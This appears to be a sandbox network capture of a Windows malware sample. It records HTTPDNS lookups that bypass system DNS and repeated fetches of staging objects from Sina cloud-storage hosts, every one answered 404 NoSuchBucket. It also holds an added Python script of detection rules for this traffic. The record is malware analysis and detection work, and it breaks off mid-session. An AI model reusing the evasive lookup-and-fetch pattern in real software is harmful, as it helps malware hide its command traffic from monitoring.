                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 32 62 34 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 31 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>32a92b43-2412-0521-2521-b4055d752a1d</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                15         | 192.168.2.5 | 49729       | 27.221.16.149   | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:21.436161041 CET | 244               | OUT       | GET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:23.254631996 CET | 512               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:14 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 766b7ab3-2412-0521-2522-5ca7213e028c
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 36 62 37 61 62 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 32 2d 35 63 61 37 32 31 33 65 30 32 38 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>766b7ab3-2412-0521-2522-5ca7213e028c</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                16         | 192.168.2.5 | 49730       | 114.114.114.114 | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:21.468045950 CET | 86                | OUT       | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                17         | 192.168.2.5 | 49731       | 27.221.16.179   | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:21.683207035 CET | 236               | OUT       | GET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:23.479823112 CET | 504               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:20 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c91b69-2412-0521-2523-5ca7213e04cc
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 39 31 62 36 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 33 2d 35 63 61 37 32 31 33 65 30 34 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>76c91b69-2412-0521-2523-5ca7213e04cc</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                18         | 192.168.2.5 | 49739       | 27.221.16.179   | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:23.381920099 CET | 244               | OUT       | GET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:25.138626099 CET | 512               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:22 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32f42f93-2412-0521-2524-b4055d752c57
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 66 34 32 66 39 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 34 2d 62 34 30 35 35 64 37 35 32 63 35 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>32f42f93-2412-0521-2524-b4055d752c57</RequestId></Error>0


                                                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                19         | 192.168.2.5 | 49751       | 123.126.45.208  | 80               | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp                          | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:28.682466030 CET | 238               | OUT       | GET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:30.289377928 CET | 528               | IN        | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:30 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 34f07294-2412-0521-2530-6c92bfce66de
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 30 37 32 39 34 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 33 30 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>34f07294-2412-0521-2530-6c92bfce66de</RequestId></Error>0
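What the sessions above record, read together: the dropped binary D74384FB8D2C9.exe resolves sinacloud.net over plain HTTP with an HTTPDNS-style query (GET /d?dn=sinacloud.net, Host set to the resolver's IP literal, User-Agent set to its own file name) against 182.254.116.116, 114.114.114.114 and 119.29.29.29. Two of the three answer with a semicolon-separated address list, 27.221.16.179;27.221.16.149, and the sample then opens connections directly to those addresses with Host: sinacloud.net to fetch /question/data.txt and a date-stamped key, /question/2024-12-05/21_22, later trying the same keys against sinastorage.com. Resolving names this way sidesteps the host's configured DNS and anything that monitors or sinkholes it, so both the lookup and the Host/destination pairing are only visible at the HTTP layer. Every storage request was answered 404 with x-error-code: NoSuchBucket, which means the staging bucket did not exist when the run took place, not that the sample is harmless.

The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code. It re-types sessions 10 through 13 and 19 as a constructed input (message bodies trimmed to the fields the rules need) and runs five detection rules over them: the HTTPDNS lookup and the addresses it returned, a User-Agent equal to the process image name, a later request whose Host is sent to an address that came out of that lookup, the date-keyed object path, and the NoSuchBucket 404. The rule names, helper names and regular expressions are this example's own.

```python
import re
from ipaddress import ip_address

# Constructed sample: sessions 10-13 and 19 from the capture above, re-typed as
# (session id, destination IP, process image, request, response). Bodies are trimmed
# to what the rules below inspect; an empty response means no reply was captured.
PROC = r"C:\Program Files (x86)\Google\D74384FB8D2C9.exe"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"

def httpdns_req(resolver_ip, name="sinacloud.net"):
    return f"GET /d?dn={name} HTTP/1.1\r\nUser-Agent: D74384FB8D2C9\r\nHost: {resolver_ip}\r\n\r\n"

def httpdns_resp(answer):
    return ("HTTP/1.1 200 OK\r\nConnection: close\r\nServer: Http Server\r\n"
            f"Content-Type: text/html\r\nContent-Length: {len(answer)}\r\n\r\n{answer}")

def storage_req(host, key):
    return (f"GET {key} HTTP/1.1\r\nUser-Agent: {BROWSER_UA}\r\nAccept-Language: zh-CN\r\n"
            f"Accept-Encoding: gzip, deflate\r\nHost: {host}\r\nRange: bytes=0-\r\nConnection: Keep-Alive\r\n\r\n")

def nosuchbucket_resp(key):
    return ("HTTP/1.1 404 Not Found\r\nServer: nginx\r\nContent-Type: application/xml\r\n"
            "x-error-code: NoSuchBucket\r\n\r\n<Error><Code>NoSuchBucket</Code>"
            f"<Message>question</Message><Resource>{key}</Resource></Error>")

SESSIONS = [
    (10, "182.254.116.116", PROC, httpdns_req("182.254.116.116"), httpdns_resp("27.221.16.179;27.221.16.149")),
    (11, "114.114.114.114", PROC, httpdns_req("114.114.114.114"), ""),
    (12, "119.29.29.29", PROC, httpdns_req("119.29.29.29"), httpdns_resp("27.221.16.149;27.221.16.179")),
    (13, "27.221.16.179", PROC, storage_req("sinacloud.net", "/question/2024-12-05/21_22"),
     nosuchbucket_resp("/question/2024-12-05/21_22")),
    (19, "123.126.45.208", PROC, storage_req("sinastorage.com", "/question/data.txt"),
     nosuchbucket_resp("/question/data.txt")),
]

HTTPDNS_PATH = re.compile(r"^/d\?dn=([A-Za-z0-9.-]+)$")          # HTTPDNS query of the form /d?dn=<name>
DATED_KEY = re.compile(r"^/[^/]+/\d{4}-\d{2}-\d{2}/\d{2}_\d{2}$")  # /<bucket>/YYYY-MM-DD/HH_MM

def parse_http(raw):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def is_ip_literal(text):
    try:
        ip_address(text)
        return True
    except ValueError:
        return False

def analyze(sessions):
    """Return (session id, rule, detail) findings; the rule names are this example's own."""
    findings = []
    resolved = {}  # domain -> set of IPs handed back over HTTPDNS earlier in the capture
    for sid, dst, proc, req_raw, resp_raw in sessions:
        req_line, req_h, _ = parse_http(req_raw)
        _, path, _ = req_line.split(" ", 2)
        host, ua = req_h.get("host", ""), req_h.get("user-agent", "")
        status, resp_h, body = parse_http(resp_raw) if resp_raw else ("", {}, "")
        image = proc.rsplit("\\", 1)[-1].rsplit(".", 1)[0]  # D74384FB8D2C9

        m = HTTPDNS_PATH.match(path)
        if m and is_ip_literal(host):  # name resolution over plain HTTP, bypassing the host's DNS
            ips = [ip for ip in body.split(";") if is_ip_literal(ip)]
            resolved.setdefault(m.group(1), set()).update(ips)
            findings.append((sid, "httpdns_lookup", f"{m.group(1)} via {dst} -> {ips or 'no reply'}"))
        if ua == image:  # User-Agent is the dropped binary's own file name
            findings.append((sid, "ua_is_image_name", ua))
        if not is_ip_literal(host) and dst in resolved.get(host, ()):  # Host pinned to an HTTPDNS answer
            findings.append((sid, "fetch_via_httpdns_ip", f"Host {host} sent to {dst}"))
        if DATED_KEY.match(path):  # time-keyed staging object
            findings.append((sid, "date_keyed_object", path))
        if status.startswith("HTTP/1.1 404") and resp_h.get("x-error-code") == "NoSuchBucket":
            findings.append((sid, "staging_bucket_missing", f"{host}{path}"))
    return findings

if __name__ == "__main__":
    for sid, rule, detail in analyze(SESSIONS):
        print(f"session {sid:>2}  {rule:<24} {detail}")
```

Run as a script it prints one line per finding. In real use the session tuples would come from a PCAP or proxy log, and the resolved map must be seeded from lookups that happened before the window being inspected: sessions 8 and 9 above already target 27.221.16.x, so the lookup that produced those addresses precedes this excerpt and would be missed by a rule that only looks inside it.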


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.549752123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:28.682508945 CET | 246 | OUT | GET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:30.257421970 CET | 536 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22080916-2b967e2
                                                                                Date: Thu, 05 Dec 2024 13:25:29 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: c029e56c-2412-0521-2529-0894eff93358
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>c029e56c-2412-0521-2529-0894eff93358</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                21 | 192.168.2.5 | 49758 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:30.384088039 CET | 85 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089039087 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                22 | 192.168.2.5 | 49759 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:30.384202003 CET | 88 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:31.983479023 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                23 | 192.168.2.5 | 49761 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:30.415700912 CET | 88 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:31.984484911 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                24 | 192.168.2.5 | 49760 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:30.417613029 CET | 85 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:32.084537029 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                25 | 192.168.2.5 | 49767 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:32.112603903 CET | 246 | OUT | GET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:33.685414076 CET | 536 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:33 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7465048a-2412-0521-2533-047bcb4b6b04
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>7465048a-2412-0521-2533-047bcb4b6b04</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                26 | 192.168.2.5 | 49768 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:32.126265049 CET | 238 | OUT | GET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:33.685031891 CET | 528 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:33 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 765b09e8-2412-0521-2533-5ca7213e0802
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>765b09e8-2412-0521-2533-5ca7213e0802</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                27 | 192.168.2.5 | 49784 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:40.284688950 CET | 88 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                28 | 192.168.2.5 | 49790 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:43.126562119 CET | 245 | OUT | GET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:44.691282034 CET | 536 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:44 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7465e5e1-2412-0521-2544-047bcb4b7810
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>7465e5e1-2412-0521-2544-047bcb4b7810</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                29 | 192.168.2.5 | 49791 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:43.127466917 CET | 237 | OUT | GET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:44.677705050 CET | 528 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:44 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 746f197e-2412-0521-2544-047bcb4b7614
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>746f197e-2412-0521-2544-047bcb4b7614</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                30 | 192.168.2.5 | 49792 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:43.505218983 CET | 88 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                31 | 192.168.2.5 | 49796 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:44.915630102 CET | 84 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:46.336008072 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                32 | 192.168.2.5 | 49797 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:44.915631056 CET | 84 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:46.334748983 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
